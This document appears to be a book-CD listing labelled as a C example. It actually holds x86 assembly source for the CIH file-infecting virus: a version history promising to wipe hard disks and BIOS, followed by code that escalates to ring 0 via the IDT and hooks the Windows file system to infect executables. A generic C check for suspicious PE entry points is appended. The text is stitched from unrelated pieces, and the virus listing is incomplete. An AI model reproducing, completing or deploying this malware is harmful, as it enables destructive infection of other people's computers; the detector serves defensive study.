046.c

Programs from the companion CD of "C Language in Practice: 105 Examples" (C语言实战105例)

Page 1 of 3
; *********************************************************

; * The Virus Program Information * 

; ******************************************************* 

; * * 
; * Designer : CIH Source : TTIT of TATUNG in Taiwan * 
; * Create Date : 04/26/1998 Now Version : 1.4 * 
; * Modification Time : 05/31/1998 * 
; * * 
; * Turbo Assembler Version 4.0 : tasm /m cih * 
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * 
; * * 
; *=========================================================* 
; * Modification History * 
; *=========================================================* 
; * v1.0 1. Create the Virus Program. * 
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * 
; * 04/26/1998 3. Virus Code doesn't Reload into System. * 
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * 
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * 
; * 6. When System Opens Existing PE File, the File will be * 
; * Infected, and the File doesn't be Reinfected. * 
; * 7. It is also Infected, even the File is Read-Only. * 
; * 8. When the File is Infected, the Modification Date and Time * 
; * of the File also don't be Changed. * 
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * 
; * Previous FileSystemApiHook, it will Call the Function * 
; * that the IFS Manager Would Normally Call to Implement * 
; * this Particular I/O Request. * 
; * 10. The Virus Size is only 656 Bytes. * 
; *============================================================* 
; * v1.1 1. Especially, the File that be Infected will not Increase * 
; * its Size... ^__^ * 
; * 05/15/1998 2. Hook and Modify Structured Exception Handling. * 
; * When Exception Error Occurs, Our OS System should be in * 
; * Windows NT. So My Cute Virus will not Continue to Run, * 
; * it will Jump to Original Application to Run. * 
; * 3. Use Better Algorithm, Reduce Virus Code Size. * 
; * 4. The Virus "Basic" Size is only 796 Bytes. * 
; *=============================================================* 
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * 
; * 2. Modify the Bug of v1.1 * 
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * 
; *============================================================* 
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * 
; * So When Open WinZip Self-Extractor ==> Don't Infect it. * 
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * 
; *=============================================================* 
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * 
; * 2. Change the Date of Killing Computers. * 
; * 05/31/1998 3. Modify Virus Version Copyright. * 
; * 4. The Virus "Basic" Size is 1019 Bytes. * 
; ************************************************************* 

.586P 

; ************************************************************* 
; * Original PE Executable File(Don't Modify this Section) * 
; ************************************************************ 

OriginalAppEXE SEGMENT 

FileHeader: 
dd 00000000h, VirusSize 

lea ecx, StopToRunVirusCode-@0[ebx] 
push ecx 

push eax 

; ************************************* 
; * Let's Modify * 
; * IDT(Interrupt Descriptor Table) * 
; * to Get Ring0 Privilege... * 
; ************************************* 

push eax ; 
sidt [esp-02h] ; Get IDT Base Address 
pop ebx ; 

add ebx, HookExceptionNumber*08h+04h ; ZF = 0 

cli 

mov ebp, [ebx] ; Get Exception Base 
mov bp, [ebx-04h] ; Entry Point 

lea esi, MyExceptionHook-@1[ecx] 

push esi 

mov [ebx-04h], si ; 
shr esi, 16 ; Modify Exception 
mov [ebx+02h], si ; Entry Point Address 

pop esi 

; ************************************* 
; * Generate Exception to Get Ring0 * 
; ************************************* 

int HookExceptionNumber ; GenerateException 
ReturnAddressOfEndException = $ 

; ************************************* 
; * Merge All Virus Code Section * 
; ************************************* 

; ************************************* 
; * Generate Exception Again * 
; ************************************* 

int HookExceptionNumber ; GenerateException Again


; ************************************* 
; * Let's Restore * 
; * Structured Exception Handling * 
; ************************************* 

ReadyRestoreSE: 
sti 

xor ebx, ebx 

jmp RestoreSE 

; ************************************* 
; * When Exception Error Occurs, * 
; * Our OS System should be in NT. * 
; * So My Cute Virus will not * 
; * Continue to Run, it Jumps to * 
; * Original Application to Run. * 
; ************************************* 

StopToRunVirusCode: 
@1 = StopToRunVirusCode 

xor ebx, ebx 
mov eax, fs:[ebx] 
mov esp, [eax] 

RestoreSE: 
pop dword ptr fs:[ebx] 
pop eax 

; ************************************* 
; * Return Original App to Execute * 
; ************************************* 

pop ebp 

push 00401000h ; Push Original 
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack 

ret ; Return to Original App Entry Point 

; ********************************************************* 
; * Ring0 Virus Game Initial Program * 
; ********************************************************* 

MyExceptionHook: 
@2 = MyExceptionHook 

jz InstallMyFileSystemApiHook 

; ************************************* 
; * Do My Virus Exist in System !? * 
; ************************************* 

mov ecx, dr0 
jecxz AllocateSystemMemoryPage 

add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException

; ************************************* 
; * Return to Ring3 Initial Program * 
; ************************************* 

ExitRing0Init: 
mov [ebx-04h], bp ; 
shr ebp, 16 ; Restore Exception 
mov [ebx+02h], bp ; 

iretd 

; ************************************* 
; * Allocate SystemMemory Page to Use * 
; ************************************* 

AllocateSystemMemoryPage: 

mov dr0, ebx ; Set the Mark of My Virus Exist in System

push 00000000fh ; 
push ecx ; 
push 0ffffffffh ; 
push ecx ; 
push ecx ; 
push ecx ; 
push 000000001h ; 
push 000000002h ; 
int 20h ; VMMCALL _PageAllocate 
_PageAllocate = $ ; 
dd 00010053h ; Use EAX, ECX, EDX, and flags 
add esp, 08h*04h 

xchg edi, eax ; EDI = SystemMemory Start Address

lea eax, MyVirusStart-@2[esi] 

iretd ; Return to Ring3 Initial Program 

; ************************************* 
; * Install My File System Api Hook * 
; ************************************* 

InstallMyFileSystemApiHook: 

lea eax, FileSystemApiHook-@6[edi] 

push eax ; 
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook 
IFSMgr_InstallFileSystemApiHook = $ ; 
dd 00400067h ; Use EAX, ECX, EDX, and flags 

mov dr0, eax ; Save OldFileSystemApiHook Address

pop eax ; EAX = FileSystemApiHook Address 

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point 
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] 
mov edx, [ecx] 
mov OldInstallFileSystemApiHook-@3[eax], edx 

; Modify IFSMgr_InstallFileSystemApiHook Entry Point 
lea eax, InstallFileSystemApiHook-@3[eax] 
mov [ecx], eax 

cli 

jmp ExitRing0Init 

; ********************************************************* 
; * Code Size of Merge Virus Code Section * 
; ********************************************************* 

CodeSizeOfMergeVirusCodeSection = offset $ 

; ********************************************************* 
; * IFSMgr_InstallFileSystemApiHook * 
; ********************************************************* 

InstallFileSystemApiHook: 
push ebx 

call @4 ; 
@4: ; 
pop ebx ; mov ebx, offset FileSystemApiHook 
add ebx, FileSystemApiHook-@4 ; 

push ebx 
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook 
IFSMgr_RemoveFileSystemApiHook = $ 
dd 00400068h ; Use EAX, ECX, EDX, and flags 
pop eax 

; Call Original IFSMgr_InstallFileSystemApiHook 
; to Link Client FileSystemApiHook 
push dword ptr [esp+8] 
call OldInstallFileSystemApiHook-@3[ebx] 
pop ecx 

push eax 

; Call Original IFSMgr_InstallFileSystemApiHook 
; to Link My FileSystemApiHook 
push ebx 
call OldInstallFileSystemApiHook-@3[ebx] 
pop ecx 

mov dr0, eax ; Adjust OldFileSystemApiHook Address

pop eax 

pop ebx 

ret 

; ********************************************************* 
; * Static Data * 
; ********************************************************* 

OldInstallFileSystemApiHook dd ? 

; ********************************************************* 
; * IFSMgr_FileSystemHook * 
; ********************************************************* 

; ************************************* 
; * IFSMgr_FileSystemHook Entry Point * 
; ************************************* 

FileSystemApiHook: 
@3 = FileSystemApiHook 

pushad 

call @5 ; 
@5: ; 
pop esi ; mov esi, offset VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-@5 

; ************************************* 
; * Is OnBusy !? * 
; ************************************* 

test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) 
jnz pIFSFunc ; goto pIFSFunc 

; ************************************* 
; * Is OpenFile !? * 
; ************************************* 

; if ( NotOpenFile ) 
; goto prevhook 
lea ebx, [esp+20h+04h+04h] 
cmp dword ptr [ebx], 00000024h 
jne prevhook 

; ************************************* 
; * Enable OnBusy * 
; ************************************* 

inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy 

; ************************************* 
; * Get FilePath's DriveNumber, * 
; * then Set the DriveName to * 
; * FileNameBuffer. * 
; ************************************* 
; * Ex. If DriveNumber is 03h, * 
; * DriveName is 'C:'. * 
; ************************************* 

; mov esi, offset FileNameBuffer 
add esi, FileNameBuffer-@6 

push esi 

mov al, [ebx+04h] 
cmp al, 0ffh 
je CallUniToBCSPath 

add al, 40h 
mov ah, ':' 

mov [esi], eax 

inc esi 
inc esi 

; ************************************* 
; * UniToBCSPath * 
; ************************************* 
; * This Service Converts * 
; * a Canonicalized Unicode Pathname * 
; * to a Normal Pathname in the * 
; * Specified BCS Character Set. * 
; ************************************* 

CallUniToBCSPath: 
push 00000000h 
push FileNameBufferSize 
mov ebx, [ebx+10h] 
mov eax, [ebx+0ch] 
add eax, 04h 
push eax 
push esi 
int 20h ; VXDCall UniToBCSPath 
UniToBCSPath = $ 
dd 00400041h 
add esp, 04h*04h 
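
The v1.1 history entry above says an infected file does not grow, and the listing returns to the host through OriginalAddressOfEntryPoint, so the PE header's entry point no longer points into the host's own code section. The C check below is an added example, not part of the original listing: it is a generic heuristic for this class of infection rather than a signature for this sample, and its function names and sample header are constructed here for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum verdict { PE_INVALID = -1, ENTRY_OK = 0, ENTRY_IN_HEADERS = 1, ENTRY_UNMAPPED = 2 };

/* Little-endian accessors that make no alignment assumptions. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Report where AddressOfEntryPoint lands in a PE32 file image held in buf. */
enum verdict classify_entry(const uint8_t *buf, size_t len)
{
    if (len < 0x40 || rd16(buf) != 0x5A4D) return PE_INVALID;       /* "MZ" */
    uint32_t pe = rd32(buf + 0x3C);                                  /* e_lfanew */
    if (pe > len || len - pe < 24 + 96) return PE_INVALID;           /* sig + COFF + PE32 fields */
    if (rd32(buf + pe) != 0x00004550) return PE_INVALID;             /* "PE\0\0" */
    uint16_t nsec = rd16(buf + pe + 6), optsz = rd16(buf + pe + 20);
    const uint8_t *opt = buf + pe + 24;
    if (rd16(opt) != 0x010B || optsz < 96) return PE_INVALID;        /* PE32 only */
    size_t sec_off = (size_t)pe + 24 + optsz;
    if (sec_off > len || (len - sec_off) / 40 < nsec) return PE_INVALID;
    uint32_t entry = rd32(opt + 16), hdrs = rd32(opt + 60);         /* entry RVA, SizeOfHeaders */
    if (entry == 0) return ENTRY_OK;                                 /* image with no entry point */
    for (uint16_t i = 0; i < nsec; i++) {
        const uint8_t *s = buf + sec_off + 40u * i;
        uint32_t vsize = rd32(s + 8), va = rd32(s + 12), raw = rd32(s + 16);
        uint32_t span = vsize > raw ? vsize : raw;
        if (entry >= va && entry - va < span) return ENTRY_OK;       /* inside a section */
    }
    return entry < hdrs ? ENTRY_IN_HEADERS : ENTRY_UNMAPPED;         /* suspicious either way */
}

/* Constructed sample: a 0x400-byte PE32 header with one section at RVA 0x1000. */
void build_sample(uint8_t *buf, uint32_t entry_rva)
{
    memset(buf, 0, 0x400);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3C, 0x80);                 /* e_lfanew */
    memcpy(buf + 0x80, "PE\0\0", 4);
    buf[0x86] = 1; buf[0x94] = 0xE0;        /* NumberOfSections, SizeOfOptionalHeader */
    uint8_t *opt = buf + 0x98, *sec = opt + 0xE0;
    opt[0] = 0x0B; opt[1] = 0x01;           /* PE32 magic */
    wr32(opt + 16, entry_rva);              /* AddressOfEntryPoint */
    wr32(opt + 60, 0x200);                  /* SizeOfHeaders */
    memcpy(sec, ".text", 5);
    wr32(sec + 8, 0x1000); wr32(sec + 12, 0x1000); wr32(sec + 16, 0x200); wr32(sec + 20, 0x200);
}
```

A verdict of ENTRY_IN_HEADERS or ENTRY_UNMAPPED is a triage signal, not proof of infection; some packers and hand-built binaries also place the entry point outside any section.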
